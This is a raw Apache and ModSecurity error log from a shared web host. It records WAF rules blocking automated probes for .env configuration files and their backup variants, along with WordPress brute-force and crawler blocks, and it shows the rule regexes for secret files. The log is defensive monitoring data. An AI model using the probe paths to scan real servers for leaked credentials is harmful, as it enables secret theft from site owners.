[Tue May 26 16:32:38.322836 2026] [proxy_http:error] [pid 808625:tid 808781] [client 207.241.173.38:27704] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:38.549727 2026] [security2:error] [pid 808625:tid 808810] [client 207.241.173.38:27894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahV9zjEl_SBaWibfDmpT0wAAADc"]
[Tue May 26 16:32:38.549900 2026] [security2:error] [pid 808625:tid 808800] [client 207.241.173.38:27878] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahV9zjEl_SBaWibfDmpT1AAAAC0"]
[Tue May 26 16:32:38.609375 2026] [proxy:error] [pid 808625:tid 808827] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:38.609441 2026] [proxy_http:error] [pid 808625:tid 808827] [client 207.241.173.38:27406] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:38.609577 2026] [security2:error] [pid 808625:tid 808766] [client 207.241.173.38:27936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahV9zjEl_SBaWibfDmpT1gAAAAs"]
[Tue May 26 16:32:38.610289 2026] [proxy:error] [pid 808625:tid 808827] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:38.610336 2026] [proxy_http:error] [pid 808625:tid 808827] [client 207.241.173.38:27406] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:38.827357 2026] [security2:error] [pid 808625:tid 808863] [client 207.241.173.38:27748] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahV9zjEl_SBaWibfDmpT4gAAAGw"]
[Tue May 26 16:32:38.951299 2026] [security2:error] [pid 808625:tid 808777] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9zTEl_SBaWibfDmpTxQAAABY"]
[Tue May 26 16:32:39.025989 2026] [security2:error] [pid 808625:tid 808776] [client 207.241.173.38:27878] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahV9zzEl_SBaWibfDmpT5gAAABU"]
[Tue May 26 16:32:39.026609 2026] [security2:error] [pid 808625:tid 808815] [client 207.241.173.38:27894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahV9zzEl_SBaWibfDmpT5wAAADw"]
[Tue May 26 16:32:39.032777 2026] [security2:error] [pid 808625:tid 808801] [client 207.241.173.38:27936] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahV9zzEl_SBaWibfDmpT6AAAAC4"]
[Tue May 26 16:32:39.238228 2026] [security2:error] [pid 808625:tid 808805] [client 207.241.173.38:27934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahV9zzEl_SBaWibfDmpT8QAAADI"]
[Tue May 26 16:32:39.245267 2026] [security2:error] [pid 808625:tid 808790] [client 207.241.173.38:27922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahV9zzEl_SBaWibfDmpT8wAAACM"]
[Tue May 26 16:32:39.246354 2026] [proxy:error] [pid 808625:tid 808877] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:39.246436 2026] [proxy_http:error] [pid 808625:tid 808877] [client 207.241.173.38:27910] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:39.247090 2026] [security2:error] [pid 808625:tid 808767] [client 207.241.173.38:27914] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahV9zzEl_SBaWibfDmpT9gAAAAw"]
[Tue May 26 16:32:39.247250 2026] [proxy:error] [pid 808625:tid 808877] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:39.247289 2026] [proxy_http:error] [pid 808625:tid 808877] [client 207.241.173.38:27910] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:39.248701 2026] [security2:error] [pid 808625:tid 808822] [client 207.241.173.38:27862] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahV9zzEl_SBaWibfDmpT-AAAAEM"]
[Tue May 26 16:32:39.248840 2026] [security2:error] [pid 808625:tid 808872] [client 207.241.173.38:27866] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahV9zzEl_SBaWibfDmpT9wAAAHU"]
[Tue May 26 16:32:39.248919 2026] [security2:error] [pid 808625:tid 808767] [client 207.241.173.38:27848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahV9zzEl_SBaWibfDmpT-QAAAAw"]
[Tue May 26 16:32:39.250439 2026] [security2:error] [pid 808625:tid 808802] [client 207.241.173.38:27838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahV9zzEl_SBaWibfDmpT-gAAAC8"]
[Tue May 26 16:32:39.304569 2026] [security2:error] [pid 808625:tid 808761] [client 207.241.173.38:27778] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahV9zzEl_SBaWibfDmpUAQAAAAY"]
[Tue May 26 16:32:39.304569 2026] [security2:error] [pid 808625:tid 808818] [client 207.241.173.38:27794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahV9zzEl_SBaWibfDmpT_gAAAD8"]
[Tue May 26 16:32:39.304688 2026] [security2:error] [pid 808625:tid 808789] [client 207.241.173.38:27786] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahV9zzEl_SBaWibfDmpUAgAAACI"]
[Tue May 26 16:32:39.304767 2026] [security2:error] [pid 808625:tid 808774] [client 207.241.173.38:27770] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahV9zzEl_SBaWibfDmpUAAAAABM"]
[Tue May 26 16:32:39.305210 2026] [proxy:error] [pid 808625:tid 808844] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:39.305280 2026] [proxy_http:error] [pid 808625:tid 808844] [client 207.241.173.38:27826] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:39.305765 2026] [security2:error] [pid 808625:tid 808869] [client 207.241.173.38:27732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.bramas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahV9zzEl_SBaWibfDmpUAwAAAHI"]
[Tue May 26 16:32:39.305902 2026] [proxy:error] [pid 808625:tid 808844] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:39.305946 2026] [proxy_http:error] [pid 808625:tid 808844] [client 207.241.173.38:27826] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:39.874141 2026] [security2:error] [pid 808625:tid 808845] [client 117.198.37.168:54168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV9zzEl_SBaWibfDmpUDAAAAFo"]
[Tue May 26 16:32:39.874267 2026] [security2:error] [pid 808625:tid 808845] [client 117.198.37.168:54168] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV9zzEl_SBaWibfDmpUDAAAAFo"]
[Tue May 26 16:32:40.211144 2026] [security2:error] [pid 808625:tid 808759] [client 176.65.139.232:34924] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "server.dezka.mx"] [uri "/.env"] [unique_id "ahV90DEl_SBaWibfDmpUHgAAAAQ"]
[Tue May 26 16:32:40.219757 2026] [proxy:error] [pid 808625:tid 808764] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:40.219826 2026] [proxy_http:error] [pid 808625:tid 808764] [client 207.241.173.38:27736] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:40.220412 2026] [proxy:error] [pid 808625:tid 808764] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:32:40.220447 2026] [proxy_http:error] [pid 808625:tid 808764] [client 207.241.173.38:27736] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:32:40.364592 2026] [security2:error] [pid 808625:tid 808848] [client 143.198.208.93:65360] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "christinaspromotions.com"] [uri "/license.txt"] [unique_id "ahV90DEl_SBaWibfDmpUIAAAAF0"]
[Tue May 26 16:32:40.834921 2026] [security2:error] [pid 808625:tid 808847] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9zzEl_SBaWibfDmpUDwAAAFw"]
[Tue May 26 16:32:41.909187 2026] [security2:error] [pid 808625:tid 808772] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV90DEl_SBaWibfDmpULgAAABE"]
[Tue May 26 16:32:42.038880 2026] [security2:error] [pid 808625:tid 808807] [client 91.142.73.116:52480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.73.142.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahV90TEl_SBaWibfDmpUPwAAADQ"], referer: https://www.glorodrc.com/index.php?route=product/category&path=97
[Tue May 26 16:32:43.756332 2026] [security2:error] [pid 808625:tid 808762] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV90zEl_SBaWibfDmpUXQAAAAc"]
[Tue May 26 16:32:44.381540 2026] [security2:error] [pid 808625:tid 808850] [client 114.119.144.42:48519] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jobs.ucdc.co.in"] [uri "/jobsearch.php"] [unique_id "ahV91DEl_SBaWibfDmpUcwAAAF8"], referer: https://www.jobs.ucdc.co.in/
[Tue May 26 16:32:44.938374 2026] [core:crit] [pid 808625:tid 808865] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:32:45.813318 2026] [security2:error] [pid 808625:tid 808828] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV91TEl_SBaWibfDmpUjQAAAEk"]
[Tue May 26 16:32:46.256129 2026] [security2:error] [pid 808625:tid 808762] [client 91.142.73.116:58736] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahV91jEl_SBaWibfDmpUnwAAAAc"], referer: https://www.glorodrc.com/index.php?route=information/contact
[Tue May 26 16:32:48.259539 2026] [security2:error] [pid 808625:tid 808859] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV91zEl_SBaWibfDmpUwwAAAGg"]
[Tue May 26 16:32:50.572038 2026] [security2:error] [pid 808625:tid 808813] [client 117.198.37.168:54529] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV92jEl_SBaWibfDmpU9QAAADo"]
[Tue May 26 16:32:50.572144 2026] [security2:error] [pid 808625:tid 808813] [client 117.198.37.168:54529] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV92jEl_SBaWibfDmpU9QAAADo"]
[Tue May 26 16:32:50.718405 2026] [core:error] [pid 808625:tid 808839] [client 207.241.173.169:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:32:50.718427 2026] [core:error] [pid 808625:tid 808839] [client 207.241.173.169:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:32:50.811034 2026] [security2:error] [pid 808625:tid 808867] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV92TEl_SBaWibfDmpU6gAAAHA"]
[Tue May 26 16:32:51.927834 2026] [security2:error] [pid 808625:tid 808757] [client 207.241.173.169:36066] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahV92zEl_SBaWibfDmpVFQAAAAI"]
[Tue May 26 16:32:51.930220 2026] [security2:error] [pid 808625:tid 808866] [client 207.241.173.169:36104] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahV92zEl_SBaWibfDmpVGgAAAG8"]
[Tue May 26 16:32:51.935414 2026] [security2:error] [pid 808625:tid 808843] [client 207.241.173.169:36114] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahV92zEl_SBaWibfDmpVIAAAAFg"]
[Tue May 26 16:32:51.940050 2026] [security2:error] [pid 808625:tid 808847] [client 207.241.173.169:36098] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahV92zEl_SBaWibfDmpVJAAAAFw"]
[Tue May 26 16:32:52.616442 2026] [security2:error] [pid 808625:tid 808813] [client 66.84.88.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV93DEl_SBaWibfDmpVPgAAADo"], referer: https://www.anujtradingco.com/
[Tue May 26 16:32:52.915535 2026] [security2:error] [pid 808625:tid 808780] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV92zEl_SBaWibfDmpVDwAAABk"]
[Tue May 26 16:32:53.756900 2026] [security2:error] [pid 808625:tid 808656] [remote 95.216.117.13:56462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV93TEl_SBaWibfDmpVXgAAZh4"]
[Tue May 26 16:32:54.337054 2026] [security2:error] [pid 808625:tid 808761] [client 66.84.88.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV93jEl_SBaWibfDmpVbwAAAAY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1227515&moderation-hash=e82de4888b341ba026f4c3be1e885563
[Tue May 26 16:32:54.693844 2026] [security2:error] [pid 808625:tid 808849] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV93TEl_SBaWibfDmpVXQAAAF4"]
[Tue May 26 16:32:54.941689 2026] [security2:error] [pid 808625:tid 808757] [client 207.241.173.169:36290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.production.copy"] [unique_id "ahV93jEl_SBaWibfDmpVfAAAAAI"]
